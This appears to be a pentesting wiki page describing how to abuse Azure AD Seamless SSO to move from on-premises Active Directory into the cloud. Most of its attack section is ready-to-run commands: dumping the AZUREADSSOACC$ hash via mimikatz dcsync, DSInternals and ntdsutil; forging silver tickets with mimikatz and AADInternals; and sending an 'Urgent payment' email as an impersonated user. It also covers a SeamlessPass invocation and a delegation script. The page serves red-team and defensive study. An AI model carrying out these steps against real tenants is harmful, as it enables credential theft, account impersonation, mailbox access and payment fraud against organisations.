Az - Seamless SSO

Basic Information

From the docs: Azure Active Directory Seamless Single Sign-On (Azure AD Seamless SSO) automatically signs users in when they are on their corporate devices connected to your corporate network. When enabled, users don't need to type in their passwords to sign in to Azure AD, and usually, even type in their usernames. This feature provides your users easy access to your cloud-based applications without needing any additional on-premises components.

Basically Azure AD Seamless SSO signs users in when they are on a on-prem domain joined PC.

It's supported by both PHS (Password Hash Sync) and PTA (Pass-through Authentication).

Desktop SSO is using Kerberos for authentication. When configured, Azure AD Connect creates a computer account called AZUREADSSOACC$ in on-prem AD. The password of the AZUREADSSOACC$ account is sent as plain-text to Azure AD during the configuration.

The Kerberos tickets are encrypted using the NTHash (MD4) of the password and Azure AD is using the sent password to decrypt the tickets.

Azure AD exposes an endpoint (https://autologon.microsoftazuread-sso.com) that accepts Kerberos tickets. Domain-joined machine's browser forwards the tickets to this endpoint for SSO.

On-prem -> cloud

The password of the user AZUREADSSOACC$ never changes. Therefore, a domain admin could compromise the hash of this account, and then use it to create silver tickets to connect to Azure with any on-prem user synced:

# Dump hash using mimikatz
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\azureadssoacc$ /domain:domain.local /dc:dc.domain.local"'
 mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit

# Dump hash using https://github.com/MichaelGrafnetter/DSInternals
Get-ADReplAccount -SamAccountName 'AZUREADSSOACC$' -Domain contoso -Server lon-dc1.contoso.local

# Dump using ntdsutil and DSInternals
## Dump NTDS.dit
ntdsutil "ac i ntds" "ifm” "create full C:\temp" q q
## Extract password
Install-Module DSInternals
Import-Module DSInternals
$key = Get-BootKey -SystemHivePath 'C:\temp\registry\SYSTEM'
(Get-ADDBAccount -SamAccountName 'AZUREADSSOACC$' -DBPath 'C:\temp\Active Directory\ntds.dit' -BootKey $key).NTHash | Format-Hexos

With the hash you can now generate silver tickets:

# Get users and SIDs
Get-AzureADUser | Select UserPrincipalName,OnPremisesSecurityIdentifier

# Create a silver ticket to connect to Azure with mimikatz
Invoke-Mimikatz -Command '"kerberos::golden /user:onpremadmin /sid:S-1-5-21-123456789-1234567890-123456789 /id:1105 /domain:domain.local /rc4:<azureadssoacc hash> /target:aadg.windows.net.nsatc.net /service:HTTP /ptt"'
mimikatz.exe "kerberos::golden /user:elrond /sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234 /domain:contoso.local /rc4:12349e088b2c13d93833d0ce947676dd /target:aadg.windows.net.nsatc.net /service:HTTP /ptt" exit

# Create silver ticket with AADInternal to access Exchange Online
$kerberos=New-AADIntKerberosTicket -SidString "S-1-5-21-854168551-3279074086-2022502410-1104" -Hash "097AB3CBED7B9DD6FE6C992024BC38F4"
$at=Get-AADIntAccessTokenForEXO -KerberosTicket $kerberos -Domain company.com
## Send email
Send-AADIntOutlookMessage -AccessToken $at -Recipient "someone@company.com" -Subject "Urgent payment" -Message "<h1>Urgent!</h1><br>The following bill should be paid asap."

To utilize the silver ticket, the following steps should be executed:

1. Initiate the Browser: Mozilla Firefox should be launched.

2. Configure the Browser:

   • Navigate to about:config.

   • Set the preference for network.negotiate-auth.trusted-uris to the specified values:

     • https://aadg.windows.net.nsatc.net

     • https://autologon.microsoftazuread-sso.com

3. Access the Web Application:

   • Visit a web application that is integrated with the organization's AAD domain. A common example is Office 365.

4. Authentication Process:

   • At the logon screen, the username should be entered, leaving the password field blank.

   • To proceed, press either TAB or ENTER.

Option 2 without dcsync - SeamlessPass

It's also possible to perform this attack without a dcsync attack to be more stealth as explained in this blog post. For that you only need one of the following:

• A compromised user's TGT: Even if you don't have one but the user was compromised,you can get one using fake TGT delegation trick implemented in many tools such as Kekeo and Rubeus.

• Golden Ticket: If you have the KRBTGT key, you can create the TGT you need for the attacked user.

• A compromised user’s NTLM hash or AES key: SeamlessPass will communicate with the domain controller with this information to generate the TGT

• AZUREADSSOACC$ account NTLM hash or AES key: With this info and the user’s Security Identifier (SID) to attack it's possible to create a service ticket an authenticate with the cloud (as performed in the previous method).

Finally, with the TGT it's possible to use the tool SeamlessPass with:

seamlesspass -tenant corp.com -domain corp.local -dc dc.corp.local -tgt <base64_TGT>

Further information to set Firefox to work with seamless SSO can be found in this blog post.

Creating Kerberos tickets for cloud-only users

If the Active Directory administrators have access to Azure AD Connect, they can set SID for any cloud-user. This way Kerberos tickets can be created also for cloud-only users. The only requirement is that the SID is a proper SID.

On-prem -> Cloud via Resource Based Constrained Delegation

Anyone that can manage computer accounts (AZUREADSSOACC$) in the container or OU this account is in, it can configure a resource based constrained delegation over the account and access it.

python rbdel.py -u <workgroup>\\<user> -p <pass> <ip> azureadssosvc$

References

• https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso

• https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/

• https://aadinternals.com/post/on-prem_admin/

• TR19: I'm in your cloud, reading everyone's emails - hacking Azure AD via Active Directory